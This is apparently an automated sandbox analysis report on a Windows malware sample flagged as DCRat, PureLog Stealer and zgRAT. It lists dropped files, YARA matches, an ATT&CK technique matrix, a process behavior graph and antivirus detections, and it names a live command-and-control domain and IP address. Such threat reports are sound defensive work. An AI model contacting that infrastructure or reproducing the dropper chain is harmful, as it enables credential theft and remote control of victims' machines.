                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe VolumeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exeQueries volume information: C:\hyperContaineragent\Bridgecommon.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe VolumeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exeQueries volume information: C:\hyperContaineragent\Bridgecommon.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe VolumeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exeQueries volume information: C:\hyperContaineragent\Bridgecommon.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00CBDF1E
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CAB146 GetVersionExW,0_2_00CAB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000005.00000002.1943082141.0000000013491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Bridgecommon.exe PID: 7636, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: nFQRHbQjcuhfqIAubZpdQD.exe PID: 6624, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 3AAyq819Vy.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.63f9700.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Bridgecommon.exe.f70000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.4d94700.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1725117408.0000000004D46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.1861446770.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1724034780.00000000063AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\hyperContaineragent\Bridgecommon.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 3AAyq819Vy.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.63f9700.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Bridgecommon.exe.f70000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.4d94700.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\hyperContaineragent\Bridgecommon.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000005.00000002.1943082141.0000000013491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Bridgecommon.exe PID: 7636, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: nFQRHbQjcuhfqIAubZpdQD.exe PID: 6624, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 3AAyq819Vy.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.63f9700.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Bridgecommon.exe.f70000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.4d94700.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1725117408.0000000004D46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.1861446770.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1724034780.00000000063AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\hyperContaineragent\Bridgecommon.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 3AAyq819Vy.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.63f9700.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Bridgecommon.exe.f70000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.4d94700.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\hyperContaineragent\Bridgecommon.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts11
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		OS Credential Dumping1
                                    System Time Discovery                                    		1
                                    Taint Shared Content                                    		11
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Exploitation for Client Execution                                    		1
                                    DLL Side-Loading                                    		11
                                    Process Injection                                    		11
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop Protocol1
                                    Clipboard Data                                    		2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts2
                                    Command and Scripting Interpreter                                    		21
                                    Registry Run Keys / Startup Folder                                    		21
                                    Registry Run Keys / Startup Folder                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager147
                                    System Information Discovery                                    		SMB/Windows Admin SharesData from Network Shared Drive12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook13
                                    Software Packing                                    		NTDS231
                                    Security Software Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets1
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    File Deletion                                    		Cached Domain Credentials141
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items243
                                    Masquerading                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                                    Virtualization/Sandbox Evasion                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                    Process Injection                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549729 Sample: 3AAyq819Vy.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 81 861848cm.nyashkoon.ru 2->81 87 Suricata IDS alerts for network traffic 2->87 89 Found malware configuration 2->89 91 Antivirus detection for URL or domain 2->91 93 18 other signatures 2->93 11 3AAyq819Vy.exe 3 6 2->11         started        14 svchost.exe 2->14         started        17 Bridgecommon.exe 2->17         started        19 9 other processes 2->19 signatures3 process4 dnsIp5 73 C:\hyperContaineragent\Bridgecommon.exe, PE32 11->73 dropped 75 6TX15s3o3dST68MJkE...Par5COcqC66esPk.vbe, data 11->75 dropped 21 wscript.exe 1 11->21         started        85 127.0.0.1 unknown unknown 14->85 file6 process7 signatures8 99 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->99 101 Suspicious execution chain found 21->101 24 cmd.exe 1 21->24         started        process9 process10 26 Bridgecommon.exe 6 25 24->26         started        30 conhost.exe 24->30         started        file11 65 C:\Users\user\Desktop\tYJQSSrA.log, PE32 26->65 dropped 67 C:\Users\user\DesktopEEoXuLc.log, PE32 26->67 dropped 69 C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe, PE32 26->69 dropped 71 6 other malicious files 26->71 dropped 103 Antivirus detection for dropped file 26->103 105 Multi AV Scanner detection for dropped file 26->105 107 Creates an undocumented autostart registry key 26->107 109 6 other signatures 26->109 32 cmd.exe 26->32         started        34 csc.exe 4 26->34         started        38 powershell.exe 26->38         started        40 5 other processes 26->40 signatures12 process13 file14 42 nFQRHbQjcuhfqIAubZpdQD.exe 32->42         started        57 3 other processes 32->57 63 C:\Windows\...\SecurityHealthSystray.exe, PE32 34->63 dropped 95 Infects executable files (exe, dll, sys, html) 34->95 47 conhost.exe 34->47         started        49 cvtres.exe 1 34->49         started        97 Loading BitLocker PowerShell Module 38->97 59 2 other processes 38->59 51 conhost.exe 40->51         started        53 conhost.exe 40->53         started        55 conhost.exe 40->55         started        61 2 other processes 40->61 signatures15 process16 dnsIp17 83 861848cm.nyashkoon.ru 37.44.238.250, 49736, 49737, 49738 HARMONYHOSTING-ASFR France 42->83 77 C:\Users\user\Desktop\izhrsOEp.log, PE32 42->77 dropped 79 C:\Users\user\Desktop\WWLLRmVS.log, PE32 42->79 dropped 111 Multi AV Scanner detection for dropped file 42->111 113 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 42->113 file18 signatures19

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    3AAyq819Vy.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    3AAyq819Vy.exe100%AviraVBS/Runner.VPG
                                    3AAyq819Vy.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe100%AviraHEUR/AGEN.1323342
                                    C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe100%AviraVBS/Runner.VPG
                                    C:\hyperContaineragent\Bridgecommon.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe100%Joe Sandbox ML
                                    C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\izhrsOEp.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe100%Joe Sandbox ML
                                    C:\hyperContaineragent\Bridgecommon.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\EEEoXuLc.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ProgramData\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
